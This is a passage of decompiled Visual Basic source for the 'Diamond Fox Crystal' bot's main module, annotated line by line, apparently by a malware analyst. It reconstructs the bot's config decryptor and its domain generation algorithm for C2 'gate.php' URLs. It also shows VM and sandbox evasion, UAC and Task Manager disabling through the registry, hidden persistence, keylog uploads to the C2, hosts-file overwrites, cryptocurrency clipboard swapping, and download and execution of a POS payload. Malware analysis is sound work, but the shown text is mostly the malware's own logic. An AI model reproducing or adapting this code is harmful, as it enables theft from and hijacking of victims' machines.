Diamond Fox Crystal, main module
'cleaned version of the decrypting function from Module1.vb | |
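'Configuration decryptor (cleaned from the raw listing further down).
'Builds a 286-entry key schedule `karr` from the key bytes, then XORs every
'ciphertext byte with one schedule entry and one key byte.
'Parameters:
'  str1_arg - ciphertext string; converted to a byte array with StrConv(.., &H80 = vbFromUnicode)
'  str2_arg - key string; converted the same way
'Output: module-level `result` receives the plaintext as a string (StrConv &H40 = vbUnicode).
'Side effects: str1/str2/karr/j1/result are module-level (undeclared here); On Error
'Resume Next suppresses every runtime error, including out-of-range indexes.
'Naming against the raw listing: s2_bound=var_AC, i1=var_B6, j1=var_B0, k1=var_B4, karr=var_A0.
Public Sub decrypt(str1_arg, str2_arg) '406ABC | |
'Data Table: 401634 | |
Dim s2_bound As Long | |
Dim i1 As Integer | |
'j1 indexes the key bytes (var_B0 in the raw listing). The earlier cleaned copy
'declared i1 twice and left j1 undeclared; this matches the raw Dim block.
Dim j1 As Long | |
Dim k1 As Long | |
On Error Resume Next | |
str1 = StrConv(str1_arg, &H80, 0) | |
str2 = StrConv(str2_arg, &H80, 0) | |
s2_bound = UBound(str2, 1) | |
'karr(0..255): identity.
For index1 = 0 To &HFF: _indx = index1 'Long | |
karr(_indx ) = CInt(_indx ) | |
Next index1 'Long | |
'karr(256..285): index with bit 8 cleared, i.e. the values 0..29.
For var_F4 = &H100 To &H11D: _indx = var_F4 'Long | |
karr(_indx ) = CInt(_indx Xor &H100) | |
Next var_F4 'Long | |
'Key-dependent entries: the last six key bytes go to karr(250..255) (1+&HF9 = 250),
'and karr(0..5) become key(i-1) Xor (255 - key(last-i)).
For var_FC = 1 To 6: _indx = var_FC 'Long | |
karr((_indx + &HF9)) = CInt(str2((s2_bound - _indx ))) | |
karr((_indx - 1)) = CInt(str2((_indx - 1))) Xor (255 - CInt(str2((s2_bound - _indx )))) | |
Next var_FC 'Long | |
i1 = 0 | |
k1 = 0 | |
'j1 is never explicitly initialised; as an undeclared Variant it starts as Empty (0 in arithmetic).
For index = 0 To UBound(str1, 1): _indx = index 'Long | |
'NOTE(review): `0 > s2_bound` is never true for a non-empty key, so j1 never wraps as
'decompiled. If the data is longer than the key, str2(j1) overruns and Resume Next skips
'the whole XOR statement below, leaving that byte untouched. Presumably the original test
'was `j1 > s2_bound` - confirm against the binary.
If (0 > s2_bound) Then | |
j1 = 0 | |
End If | |
'k1 walks the 286-entry schedule; on each wrap i1 is toggled with Not. The first wrap
'restarts at 0, the wrap seen while i1 = &HFF restarts at 5.
If ((k1 > &H11D) And (i1 = 0)) Then | |
k1 = 0 | |
i1 = Not(i1) | |
End If | |
If ((k1 > &H11D) And (i1 = &HFF)) Then | |
k1 = 5 | |
i1 = Not(i1) | |
End If | |
'plain = cipher Xor schedule(k1) Xor key(j1), in place.
str1(_indx) = CByte(CInt(str1(_indx)) Xor karr(k1) Xor CInt(str2(j1))) | |
j1 = (j1 + 1) | |
k1 = (k1 + 1) | |
Next index 'Long | |
loc_406AB2: result = CStr(StrConv(str1, &H40, 0)) | |
loc_406ABA: Exit Sub | |
End Sub |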
'cleaned version of the DGA from Module1.vb | |
'Domain generation algorithm (cleaned from the raw listing further down).
'Derives one C2 URL from the current date and several config slots; the caller
'(Proc_0_10_40655C) invokes it for arg_C = 0 .. Me(112) to get a list of candidates.
'Parameter arg_C: day offset added to the start of the current period.
'Config slots used (decompiler names; meanings taken from how they are used here):
'  Me(120) - seed date, parsed with DateValue (Proc_0_10 only calls the DGA when Len(Me(120)) < 11)
'  Me(116) - period length in days (the Mod below)
'  Me(92) & Me(124) - character pool the domain name is drawn from
'  Me(148) - "|"-separated list of TLD candidates
'  Me(108) - number of characters in the generated name
'Output: module-level `domain_name` = "http://<name>.<ext>/gate.php" (lower-cased).
'`domain_name`, `baseStr` and `ext` are not declared locally; domain_name is appended to,
'never reset, inside this Sub.
Public Sub domain_generate(arg_C) '407084 | |
'Data Table: 401634 | |
Dim var_BC As Double | |
Dim var_AC As Long | |
Dim var_A8 As Double | |
Dim vDay As Single | |
Dim vMonth As Single | |
Dim vYear As Single | |
Dim arg_2008 As Variant | |
Dim var_9C As Long | |
On Error Resume Next | |
baseStr = Me(92) & Me(124) | |
var_BC = CDate(DateValue(Me(120))) | |
'Days elapsed since the seed date; negative means the seed date is in the future.
var_AC = CLng((DateValue(CStr(Now)) - CDate(var_BC))) | |
If (var_AC < 0) Then | |
Exit Sub | |
'The `End` after Exit Sub is unreachable (decompiler residue).
End | |
End If | |
'Snap to the start of the current Me(116)-day period, then add the caller's offset.
var_A8 = CDate((var_BC + CDbl((var_AC - (var_AC Mod Me(116)))))) | |
vDay = CDbl(Day(CDate(CDate((var_A8 + CDbl(arg_C)))))) | |
vMonth = CDbl(Month(CDate(CDate((var_A8 + CDbl(arg_C)))))) | |
vYear = CDbl(Year(CDate(CDate((var_A8 + CDbl(arg_C)))))) | |
arg_2008 = Split(Me(148), "|", -1, 0) | |
'VB precedence: Mod binds tighter than Xor, so the index is month Xor (day Mod UBound).
ext = arg_2008((CLng(vMonth) Xor CLng(vDay) Mod UBound(arg_2008, 1))) | |
'Seed: (year high byte) * (day * Tan(year low byte)) Xor Cos(month * 10), all truncated to Long.
var_9C = (((CLng(vYear) And &HFF00) / &H100) * CLng((vDay * Tan(CDbl((CLng(vYear) And &HFF))))) Xor CLng(Cos((vMonth * CDbl(&HA))))) | |
var_9C = Abs(var_9C) | |
If CBool((var_9C Mod 2)) Then | |
var_9C = var_9C Xor (CLng(vYear) / CLng((vMonth * vDay))) | |
End If | |
'Pick Me(108) characters; the position is ((seed*i Xor seed\2) Mod Len) - Len, made positive with Abs.
For var_11C = 1 To Me(108): var_C4 = var_11C 'Long | |
domain_name = domain_name & Mid$(baseStr, Abs((((var_9C * var_C4 Xor CLng((CDbl(var_9C) / CDbl(2)))) Mod Len(baseStr)) - Len(baseStr))), 1) | |
Next var_11C 'Long | |
domain_name = "http://" & LCase$(domain_name & "." & ext) & "/gate.php" | |
Exit Sub | |
End Sub |
'Object: Module1 | |
'(cleaned manually) | |
'Entry point of the bot. Flow as decompiled:
'  1. locate own executable (GetModuleFileName) and keep the path in Me(88);
'  2. pull the encrypted config from resource "L!NK" or, failing that, from the tail of the
'     executable after a 22-dash separator; decrypt it into PARAMS_STORAGE;
'  3. run the config-gated anti-analysis checks (sandbox DLLs, volume serials, delay);
'  4. install: mutex, hidden/system attributes, UAC registry tweaks, persistence;
'  5. enter the endless service loop (Proc_0_1_4087AC + DoEvents).
'Many locals (var_88, var_8C, var_90, var_C8, var_114, var_124) are undeclared decompiler temps.
Public Sub main | |
'Data Table: 401634 | |
Dim MemVar_40B3A4 As Global | |
Dim var_A8 As String | |
Dim var_94 As String | |
Dim var_118 As Long | |
Dim var_11C As Long | |
Dim var_F8 As Integer | |
Dim var_144 As String | |
Dim var_98 As String | |
loc_4096D4: On Error Resume Next | |
loc_4096E4: var_90 = MemVar_40B3A4.App | |
'Hide the process from the task list of the VB runtime.
loc_4096EC: App.TaskVisible = False | |
'Own executable path; the decompiler lost the buffer-to-string steps between here and var_98.
loc_40970A: GetModuleFileName(0, var_8C, &HFF) | |
loc_409743: var_94 = var_98 | |
loc_40974E: var_98 = Replace(var_94, vbNullString, 0, 1, -1, 0) | |
loc_409757: var_8C = var_94 | |
'Me(88) = own path; reused by FileCopy/SetAttr here and by make_persistent.
loc_40975D: Me(88) = var_98 | |
loc_409768: fetch_logical_disks(StrConv(var_98, vbUnicode)) | |
'Config source: resource "L!NK" (id "1"); if it is empty, read the own file and take the
'part after String$(&H16, "-") (22 dashes) as the encrypted blob.
loc_409787: If Not((Len(Proc_0_40_40628C("L!NK")) <> 0)) Then | |
loc_4097A1: Me.Global.LoadResData "L!NK", "1", var_C8 | |
loc_4097D6: If Not((Len(CStr(StrConv(var_C8, &H40, 0))) <> 0)) Then | |
loc_40982E: var_88 = CStr(Split(file_binary_open(Me(88)), CVar(String$(&H16, "-")), -1, 0)(1)) | |
loc_409845: End If | |
loc_409847: End If | |
'The decryption key is computed by Proc_0_19_404CD8 from Len(var_88) alone.
loc_40985F: PARAMS_STORAGE = decrypt(var_88, Proc_0_19_404CD8(var_88)) | |
loc_409877: If Not((Len(PARAMS_STORAGE) <> 0)) Then | |
loc_40987C: End | |
loc_40987E: End If | |
'Config flags 7 / 8 / 6 / &HB / &H12 select check_sandbox_dll cases 1 (vboxmrxnp), 3 (vmGuestLib),
'5 (pthreadVC), 2 (SbieDll), 4 (snxhk); 9 / &HC / &HD select the three volume serials.
loc_409897: If CBool(load_param(7, 0)) Then | |
loc_4098A4: check_sandbox_dll(1) | |
loc_4098A9: End If | |
loc_4098C2: If CBool(load_param(8, 0)) Then | |
loc_4098CF: check_sandbox_dll(3) | |
loc_4098D4: End If | |
loc_4098ED: If CBool(load_param(6, 0)) Then | |
loc_4098FA: check_sandbox_dll(5) | |
loc_4098FF: End If | |
loc_409918: If CBool(load_param(9, 0)) Then | |
loc_409925: check_volume_serials(1) | |
loc_40992A: End If | |
loc_40993B: var_94 = load_param(&HA, 0) | |
loc_409943: If CBool(var_94) Then | |
loc_409948: Proc_0_2_404004(var_94) | |
loc_40994D: End If | |
loc_409966: If CBool(load_param(&HB)) Then | |
loc_409973: check_sandbox_dll(2) | |
loc_409978: End If | |
loc_409991: If CBool(load_param(&HC, 0)) Then | |
loc_40999E: check_volume_serials(2) | |
loc_4099A3: End If | |
loc_4099BC: If CBool(load_param(&HD, 0)) Then | |
loc_4099C9: check_volume_serials(3) | |
loc_4099CE: End If | |
loc_4099E7: If CBool(load_param(&HE, 0)) Then | |
loc_4099EC: delay_execution(0) | |
loc_4099F1: End If | |
loc_409A0A: If CBool(load_param(&H12)) Then | |
loc_409A17: check_sandbox_dll(4) | |
loc_409A1C: End If | |
'Me(92) = base64-decoded param 3; it serves as the mutex name below, as the key for
'encrypted params (load_param) and as part of the DGA character pool (domain_generate).
loc_409A36: Me(92) = base64_decode(load_param(3, 0)) | |
'Me(104) appears to be a settings record; the decompiler shows its fields as var_118(n).
loc_409A46: var_118 = Me(104) | |
loc_409A5D: var_118(28) = load_param(&H15, &HFF) | |
loc_409A79: var_118(32) = load_param(&H16, &HFF) | |
loc_409A95: var_118(40) = load_param(&H24, &HFF) | |
loc_409AB3: var_118(58) = CBool(load_param(&H1A, 0)) | |
loc_409AC7: init_globals(0, 0) | |
loc_409ADA: var_90 = Me.Global.App | |
'Install logic. The If/Else nesting from here to loc_40A05F is as emitted by the decompiler
'and should be read with care (three End Ifs share address 40A013).
loc_409AF7: If (App.EXEName = MY_APPNAME) Then | |
loc_409B08: If (MY_DIR = Me(40)) Then | |
loc_409B17: FileCopy Me(88), MY_APPNAME | |
loc_409B23: shell_execute(MY_APPNAME) | |
loc_409B2A: End | |
loc_409B2F: Else | |
loc_409B3D: If (Me(88) = MY_APPNAME) Then | |
loc_409B47: var_11C = Me(104) | |
loc_409B5E: var_11C(16) = load_param(0, &HFF) | |
loc_409B7B: var_11C(0) = CLng(load_param(1, &HFF)) | |
loc_409B97: var_11C(20) = load_param(2, &HFF) | |
loc_409BB3: var_11C(24) = load_param(4, &HFF) | |
loc_409BCF: var_11C(36) = load_param(5, &HFF) | |
loc_409BED: var_11C(48) = CBool(load_param(&H17, 0)) | |
loc_409C0B: var_11C(50) = CBool(load_param(&H18, 0)) | |
loc_409C29: var_11C(52) = CBool(load_param(&H19, 0)) | |
loc_409C47: var_11C(56) = CBool(load_param(&H22, 0)) | |
loc_409C65: var_11C(54) = CBool(load_param(&H21, 0)) | |
loc_409C83: var_11C(60) = CBool(load_param(&H13, 0)) | |
loc_409CA1: var_11C(62) = CBool(load_param(&H1D, 0)) | |
loc_409CBF: var_11C(66) = CBool(load_param(&H20, 0)) | |
loc_409CCE: var_11C = 0 | |
'Single-instance guard: named mutex = Me(92). &HB7 = 183 = ERROR_ALREADY_EXISTS, so a
'second instance terminates. The GUID call presumably fetches the last DLL error - confirm.
loc_409CDB: var_94 = Me(92) | |
loc_409CE9: CreateMutex(0, 1, var_94) | |
loc_409D05: Set var_90 = Err() | |
loc_409D0B: Call {A4C466B8-499F-101B-BB7800AA00383CBB}.Method_Proc_0_0_40A064C (var_114, StrConv(Me(92), vbUnicode), var_94) | |
loc_409D1C: If (var_114 = &HB7) Then | |
loc_409D21: End | |
loc_409D23: End If | |
'Attribute 6 = vbHidden (2) + vbSystem (4) on the executable and on MY_DIR.
loc_409D2F: SetAttr Me(88), 6 | |
loc_409D40: SetAttr MY_DIR, 6 | |
loc_409D5E: If CBool(load_param(&H14, 0, var_11C)) Then | |
loc_409D63: Proc_0_10_40655C(var_11C) | |
loc_409D6F: If Proc_0_30_4060D8(0) Then | |
loc_409D8C: modify_bot_install("1", 0) | |
loc_409D94: End If | |
loc_409D96: End If | |
'NOTE(review): the branch below writes HKLM values, which needs elevation, and the Else
'branch runs the RunAs prompt loop (Proc_0_20_4054D4); UnknownFunc(&HFF) is therefore
'presumably an is-elevated probe - confirm.
loc_409D9F: If UnknownFunc(&HFF) Then | |
loc_409DBB: If CBool(load_param(&H10, 0)) Then | |
loc_409DD2: disable_tskmgr_regtools("1", "1") | |
loc_409DDE: End If | |
loc_409DF7: If CBool(load_param(&H11, 0)) Then | |
loc_409E0E: disable_tskmgr_regtools("0", "1") | |
loc_409E1A: End If | |
'WScript.Shell RegWrite; the decompiler lifted its arguments into var_A8 (path),
'var_F8 (data = 0) and var_144 (type). Both values are set to 0: UAC notifications off
'and EnableLUA = 0 (UAC disabled after reboot). These are high-value detection artifacts.
loc_409E21: Set var_124 = WSCRIPT_OBJ | |
loc_409E27: var_A8 = "HKLM\Software\Microsoft\Security Center\UACDisableNotify" | |
loc_409E2D: var_F8 = 0 | |
loc_409E33: var_144 = "REG_DWORD" | |
loc_409E3C: Call var_124.RegWrite | |
loc_409E44: var_A8 = "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA" | |
loc_409E4A: var_F8 = 0 | |
loc_409E50: var_144 = "REG_DWORD" | |
loc_409E59: Call var_124.RegWrite | |
loc_409E63: Set var_124 = Nothing | |
loc_409E83: If (CBool(load_param(&H1E, 0, var_144, var_F8, var_A8)) = 0) Then | |
loc_409E98: write_to_file(OFF_C, 0, var_144) | |
loc_409EA0: End If | |
loc_409EA5: Else | |
'Not elevated: param &HF enables the repeated RunAs self-relaunch (Proc_0_20_4054D4).
loc_409EC0: If CBool(load_param(&HF, 0, var_F8)) Then | |
loc_409EC5: Proc_0_20_4054D4(var_A8) | |
loc_409ECA: End If | |
loc_409EDC: write_to_file(OFF_C, 0) | |
loc_409EE4: End If | |
'&H23: Proc_0_8_405EC0 deletes .exe/.vbs files in AppData/Temp/Me(40);
'&H1F: Proc_0_7_404894 wipes Chrome and Firefox profile folders.
loc_409EFF: If CBool(load_param(&H23, 0)) Then | |
loc_409F04: Proc_0_8_405EC0(0) | |
loc_409F09: End If | |
loc_409F22: If CBool(load_param(&H1F)) Then | |
loc_409F27: Proc_0_7_404894(0) | |
loc_409F2C: End If | |
'add_schtask = 0 here, so the scheduled task is created at install time only.
loc_409F33: make_persistent(0) | |
'Me(168) = &HFF enables the POS_PATH branch of the service loop (Proc_0_1_4087AC).
loc_409F5F: If (get_attribute1(POS_PATH) Or (CBool(load_param(&H1C, 0)) = &HFF)) Then | |
loc_409F66: Me(168) = &HFF | |
loc_409F6B: End If | |
loc_409F7A: fingerprint_system(0) | |
'C2 selection (hard-coded list or DGA); terminates the process if none answers "OK".
loc_409F84: Proc_0_10_40655C() | |
loc_409F95: If get_attribute1(LOGNAME) Then | |
loc_409F9A: Proc_0_32_4051F0() | |
loc_409FA2: Else | |
loc_409FBD: If CBool(load_param(&H1B)) Then | |
loc_409FC2: Proc_0_31_4046A4(0) | |
loc_409FC7: End If | |
loc_409FC9: End If | |
loc_409FD2: If Me(170) Then | |
loc_409FDC: var_94 = 0 | |
loc_409FEA: Proc_0_29_4059BC(&HB) | |
loc_409FF2: End If | |
loc_409FF4: Proc_0_30_4060D8(var_94) | |
'Service loop: `If &HFF` is always true and the GoTo makes it endless; DoEvents keeps
'the VB message pump alive between iterations.
loc_409FF9: ' Referenced from: 40A010 | |
loc_409FFD: If &HFF Then | |
loc_40A002: Proc_0_1_4087AC() | |
loc_40A009: DoEvents() | |
loc_40A010: GoTo loc_409FF9 | |
loc_40A013: End If | |
loc_40A013: End If | |
loc_40A013: End If | |
loc_40A018: Else | |
'First run from a foreign location: create the install directory and install.
loc_40A031: MkDir Me(52) & Me(144) & "\" | |
loc_40A057: modify_bot_install("1", &HFF) | |
loc_40A05F: End If | |
loc_40A063: Exit Sub | |
End Sub | |
'One iteration of the service loop (called endlessly from main). Each call advances a set
'of tick counters kept in MemVar_402104 and fires a task when a counter reaches its
'threshold; four Sleep(&H64) (100 ms) and one Sleep(&H1F4) (500 ms) pace the loop.
'Tasks: C2 poll + hosts file update + KEYS_C upload (every Me(104) ticks), clipboard
'replacement (every tick), three optional jobs every &H1E = 30 ticks, and the POS_PATH
'job every &H1A4 = 420 ticks.
Public Sub Proc_0_1_4087AC | |
'Data Table: 401634 | |
Dim MemVar_402104.global_0 As Long | |
Dim var_90 As String | |
Dim MemVar_402104.global_20 As Long | |
Dim clipboard As Clipboard | |
Dim MemVar_402104.global_16 As Long | |
Dim MemVar_402104.global_4 As Long | |
Dim MemVar_402104.global_8 As Long | |
Dim MemVar_402104.global_12 As Long | |
Dim MemVar_402104.global_24 As Long | |
loc_40837C: On Error Resume Next | |
loc_408394: MemVar_402104.global_0 = (MemVar_402104.global_0 + 1) | |
loc_4083A7: If (MemVar_402104.global_0 = Me(104)) Then | |
loc_4083AC: cnc_post_and_read(MemVar_402104.global_0) | |
'Hosts file: when the OFF_C marker file is absent, fetch MY_DOMAIN?u=1, and overwrite
'HOSTS_PATH if its current content differs from the response.
loc_4083BE: If Not(get_attribute1(OFF_C)) Then | |
loc_4083D3: var_88 = MY_DOMAIN & "?u=" & "1" | |
loc_4083E5: UnknownFunc(var_88) | |
loc_408409: var_8C = process_data(var_88, &HFF, 0) | |
loc_408418: var_90 = file_binary_open(HOSTS_PATH, StrConv(var_88, vbUnicode)) | |
loc_408423: If (var_90 <> var_8C) Then | |
loc_408430: write_to_file(HOSTS_PATH, var_8C) | |
loc_408435: End If | |
loc_408437: End If | |
'Upload KEYS_C (type 7) whenever its size changed since the last check; per its name a
'key-log file - not verified here.
loc_40844E: If (MemVar_402104.global_20 <> FileLen(KEYS_C)) Then | |
loc_408462: MemVar_402104.global_20 = FileLen(KEYS_C) | |
loc_408488: post_content(KEYS_C, Proc_0_49_404F40(7, MemVar_402104.global_20)) | |
loc_408494: End If | |
loc_4084A2: MemVar_402104.global_0 = 0 | |
loc_4084A5: End If | |
loc_4084AE: Sleep(&H64) | |
'Clipboard swap: when Me(140) is a 34-char string (&H22) and the clipboard holds a
'34-char string starting with "1" (&H31) that differs from it, replace the clipboard text
'with Me(140). The shape matches a cryptocurrency-address swap - confirm Me(140).
'Note the decompiler reads the text into var_B4 but compares var_A0 = var_90.
loc_4084C1: If (Len(Me(140)) = &H22) Then | |
loc_4084DE: Me.Global.Clipboard.GetText var_B4 | |
loc_4084E6: var_A0 = var_90 | |
loc_4084F8: If (var_A0 <> Me(140)) Then | |
loc_408513: If ((AscW(var_A0) = &H31) And (Len(var_A0) = &H22)) Then | |
loc_408529: Set clipboard = Me.Global.Clipboard | |
loc_408531: clipboard.Clear | |
loc_408544: clipboard.SetText Me(140), var_B4 | |
loc_40854D: Set clipboard = Nothing | |
loc_408551: End If | |
loc_408553: End If | |
loc_408555: End If | |
loc_40855E: Sleep(&H64) | |
'Every 30 ticks, gated by Me(164) / Me(166) / Me(170) respectively.
loc_40856A: If Me(164) Then | |
loc_408582: MemVar_402104.global_16 = (MemVar_402104.global_16 + 1) | |
loc_408595: If (MemVar_402104.global_16 = &H1E) Then | |
loc_40859A: Proc_0_42_408E68(MemVar_402104.global_16, var_90, MemVar_402104.global_0) | |
loc_4085AB: MemVar_402104.global_16 = 0 | |
loc_4085AE: End If | |
loc_4085B0: End If | |
loc_4085B9: Sleep(&H64) | |
loc_4085C5: If Me(166) Then | |
loc_4085DD: MemVar_402104.global_4 = (MemVar_402104.global_4 + 1) | |
loc_4085F0: If (MemVar_402104.global_4 = &H1E) Then | |
loc_408608: Proc_0_29_4059BC(6, 0, MemVar_402104.global_4) | |
loc_40861C: MemVar_402104.global_4 = 0 | |
loc_40861F: End If | |
loc_408621: End If | |
loc_40862A: Sleep(&H64) | |
'Re-asserts the Run-key persistence (add_schtask = &HFF skips the schtasks part).
loc_408636: If Me(170) Then | |
loc_40864E: MemVar_402104.global_8 = (MemVar_402104.global_8 + 1) | |
loc_408661: If (MemVar_402104.global_8 = &H1E) Then | |
loc_40866B: make_persistent(&HFF, MemVar_402104.global_8, MemVar_402104.global_4) | |
loc_40867C: MemVar_402104.global_8 = 0 | |
loc_40867F: End If | |
loc_408681: End If | |
loc_40868A: Sleep(&H64) | |
'POS module (enabled by main via Me(168)): if POS_PATH exists, every 420 ticks kill
'POS_EXE, upload OUTPUT_TXT (type 8) when its size changed, and start POS_PATH again;
'if it does not exist, download it from MY_DOMAIN?p=13.
loc_408699: If (Me(168) = &HFF) Then | |
loc_4086AB: If (get_attribute1(POS_PATH, MemVar_402104.global_8, MemVar_402104.global_16) = &HFF) Then | |
loc_4086C3: MemVar_402104.global_12 = (MemVar_402104.global_12 + 1) | |
loc_4086D6: If (MemVar_402104.global_12 = &H1A4) Then | |
loc_4086E0: kill_task(POS_EXE, MemVar_402104.global_12) | |
loc_4086FA: If (MemVar_402104.global_24 <> FileLen(OUTPUT_TXT)) Then | |
loc_40870E: MemVar_402104.global_24 = FileLen(OUTPUT_TXT) | |
loc_408734: post_content(OUTPUT_TXT, Proc_0_49_404F40(8, MemVar_402104.global_24), 0) | |
loc_408740: End If | |
loc_408749: shell_execute(POS_PATH, 0) | |
loc_40875A: MemVar_402104.global_12 = 0 | |
loc_40875D: End If | |
loc_408762: Else | |
loc_408788: process_and_write_to_file(MY_DOMAIN & "?p=" & CStr(&HD), POS_PATH, &HFF) | |
loc_408796: End If | |
loc_408798: End If | |
loc_4087A1: Sleep(&H1F4) | |
loc_4087A8: Exit Sub | |
End Sub | |
'Config-gated exit check (main calls it with the value of param &HA, although the
'decompiled signature shows no parameter). Calls UnknownFunc on var_9C(0) and
'terminates the process when bit 7 of var_9C(&HB) is set. What var_9C holds is not
'recoverable from this listing.
Public Sub Proc_0_2_404004 | |
'Data Table: 401634 | |
loc_403FD4: On Error Resume Next | |
loc_403FE2: UnknownFunc(var_9C(0)) | |
loc_403FFA: If CBool((var_9C(&HB) And &H80)) Then | |
loc_403FFF: End | |
loc_404001: End If | |
loc_404003: Exit Sub | |
End Sub | |
'Stalling loop enabled by config param &HE: sleeps 500 ms (&H1F4) per iteration.
'NOTE(review): the exit condition as decompiled compares two GetTickCount readings
'against the same 500 ms; presumably it verifies that the Sleep really elapsed
'(a sleep-skipping check) - confirm against the binary.
Public Sub delay_execution | |
'Data Table: 401634 | |
loc_403C90: On Error Resume Next | |
loc_403C95: Do 'loop at: 403CBC | |
loc_403CA6: Sleep(&H1F4) | |
loc_403CBC: Loop Until Not ((GetTickCount(GetTickCount()) - GetTickCount()) < &H1F4) 'do at: 403C95 | |
loc_403CC1: Exit Sub | |
End Sub | |
'Anti-analysis check: maps arg_C (1..5) to a DLL base name and terminates the process
'when UnknownFunc(name & ".dll") returns non-zero (presumably a module-presence test).
'The names are the usual guest/sandbox helper libraries: vboxmrxnp (VirtualBox),
'SbieDll (Sandboxie), vmGuestLib (VMware), snxhk (Avast sandbox), pthreadVC.
'Which checks run is decided by config flags in main.
Public Sub check_sandbox_dll(arg_C) '40479C | |
'Data Table: 401634 | |
Dim var_8C As Long | |
loc_4046E4: On Error Resume Next | |
loc_4046EC: var_8C = arg_C | |
loc_4046FA: If (var_8C = 1) Then | |
loc_404702: var_88 = "vboxmrxnp" | |
loc_404708: Else | |
loc_404713: If (var_8C = 2) Then | |
loc_40471B: var_88 = "SbieDll" | |
loc_404721: Else | |
loc_40472C: If (var_8C = 3) Then | |
loc_404734: var_88 = "vmGuestLib" | |
loc_40473A: Else | |
loc_404745: If (var_8C = 4) Then | |
loc_40474D: var_88 = "snxhk" | |
loc_404753: Else | |
loc_40475E: If (var_8C = 5) Then | |
loc_404766: var_88 = "pthreadVC" | |
loc_404769: End If | |
loc_404769: End If | |
loc_404769: End If | |
loc_404769: End If | |
loc_404769: End If | |
'Any other arg_C leaves var_88 empty and tests ".dll".
loc_404790: If (UnknownFunc(var_88 & ".dll") <> 0) Then | |
loc_404795: End | |
loc_404797: End If | |
loc_404799: Exit Sub | |
End Sub | |
'Anti-analysis check: terminates the process when the global VOL_SERIAL equals one of
'three hard-coded volume serial numbers selected by index (1..3). Any other index
'compares against an empty string.
Public Sub check_volume_serials(index) '4041F8 | |
'Data Table: 401634 | |
Dim _index As Long | |
loc_40418C: On Error Resume Next | |
loc_404194: _index = index | |
loc_4041A2: If (_index = 1) Then | |
loc_4041AA: var_88 = "AC79B241" | |
loc_4041B0: Else | |
loc_4041BB: If (_index = 2) Then | |
loc_4041C3: var_88 = "70144646" | |
loc_4041C9: Else | |
loc_4041D4: If (_index = 3) Then | |
loc_4041DC: var_88 = "6C78A9C3" | |
loc_4041DF: End If | |
loc_4041DF: End If | |
loc_4041DF: End If | |
loc_4041ED: If (VOL_SERIAL = var_88) Then | |
loc_4041F2: End | |
loc_4041F4: End If | |
loc_4041F6: Exit Sub | |
End Sub | |
'Writes HKCU\...\Policies\System\DisableRegistryTools (arg_C = "1") or DisableTaskMgr
'(anything else) as a REG_DWORD through MemVar_402104.RegWrite (a WScript.Shell-style
'object). The value data is not visible here; main passes a second argument "1" that
'the decompiled signature does not show.
Public Sub disable_tskmgr_regtools(arg_C) '404294 | |
'Data Table: 401634 | |
Dim var_A0 As Variant | |
Dim var_D0 As String | |
loc_404230: On Error Resume Next | |
loc_40423D: If (arg_C = "1") Then | |
loc_404245: var_88 = "RegistryTools" | |
loc_40424B: Else | |
loc_404250: var_88 = "TaskMgr" | |
loc_404253: End If | |
'RegWrite arguments lifted into var_A0 (path) and var_D0 (type) by the decompiler.
loc_40426A: var_A0 = CVar("HKCU" & "\Software\Microsoft\Windows\CurrentVersion\Policies\System\Disable" & var_88) 'String | |
loc_404275: var_D0 = "REG_DWORD" | |
loc_404280: Call MemVar_402104.RegWrite | |
loc_404292: Exit Sub | |
End Sub | |
'Browser-profile wipe (config param &H1F): kills Chrome and Firefox via taskkill, then
'hands the Chrome "User Data" folder and the Firefox "Profiles" folder to
'Proc_0_14_403F14 (FSO DeleteFolder when its second argument is true) and deletes
'Profiles.ini. Only the Firefox call passes the delete flag (&HFF) explicitly.
Public Sub Proc_0_7_404894 | |
'Data Table: 401634 | |
loc_4047DC: On Error Resume Next | |
loc_4047EC: kill_task("Chrome.exe") | |
loc_404801: kill_task("firefox.exe") | |
loc_40483F: Proc_0_14_403F14(Environ$("LOCALAPPDATA") & "\Google\Chrome\User Data") | |
loc_404868: Proc_0_14_403F14(APPDATA_DIR & "Mozilla\Firefox\Profiles", &HFF) | |
loc_404885: Kill CVar(APPDATA_DIR & "Mozilla\Firefox\Profiles.ini") | |
loc_404892: Exit Sub | |
End Sub | |
'File cleanup (config param &H23): kills wscript.exe, then for each of APPDATA_DIR,
'TEMP_DIR and Me(40) enumerates the folder's files (FSO .Files collection, the
'decompiler dropped the GetFolder call) and deletes every file whose name contains
'".exe" or ".vbs" anywhere in the name (InStr, not an extension test), pausing 500 ms
'before each delete.
Public Sub Proc_0_8_405EC0 | |
'Data Table: 401634 | |
loc_405D80: On Error Resume Next | |
loc_405D92: var_A0(0) = APPDATA_DIR | |
loc_405DA2: var_A0(1) = TEMP_DIR | |
loc_405DB2: var_A0(2) = Me(40) | |
loc_405DBE: kill_task("wscript.exe") | |
loc_405DD5: For var_B8 = 0 To 2: var_AC = var_B8 'Long | |
loc_405DED: LateMemCallLdVar | |
loc_405DF5: CAdVar | |
loc_405E08: CAdVar | |
loc_405E14: For Each var_A8 In MemVar_402104.Files | |
loc_405E63: If CBool(InStr(1, var_A8.Name, ".exe", 0) Or InStr(1, var_A8.Name, ".vbs", 0)) Then | |
loc_405E6D: Sleep(&H1F4) | |
loc_405E8A: Kill CVar(var_A0(var_AC)) & var_A8.Name | |
loc_405E96: End If | |
loc_405E9D: Next | |
loc_405EA8: Next var_B8 'Long | |
loc_405EB1: Set var_88 = Nothing | |
loc_405EB9: Set var_A8 = Nothing | |
loc_405EBF: Exit Sub | |
End Sub | |
'Builds a query-string fragment describing local state, in var_88 (the decompiler
'shows no Result statement, so the return path is lost): "&x=1" when the OFF_C marker
'is absent, "&y=1" when POS_PATH exists, "&z=1" when LOGNAME exists. No error
'handler, unlike the other procedures.
Public Sub Proc_0_9_4040BC | |
'Data Table: 401634 | |
loc_40406B: If Not(get_attribute1(OFF_C)) Then | |
loc_404075: var_88 = "&x=1" | |
loc_404078: End If | |
loc_404082: If get_attribute1(POS_PATH) Then | |
loc_404093: var_88 = var_88 & "&y=1" | |
loc_404099: End If | |
loc_4040A3: If get_attribute1(LOGNAME) Then | |
loc_4040B4: var_88 = var_88 & "&z=1" | |
loc_4040BA: End If | |
loc_4040BA: Exit Sub | |
End Sub | |
'C2 selection. Candidate list:
'  - if Me(120) is shorter than 11 characters (&HB) it is treated as the DGA seed date:
'    domain_generate is called for offsets 0..Me(112) and the results joined with CRLF;
'  - otherwise Me(120) itself is a CRLF-separated list of hard-coded domains.
'Each candidate longer than 10 characters is tried after waiting for internet
'connectivity (test_connection_microsoft); the first one whose process_data reply is
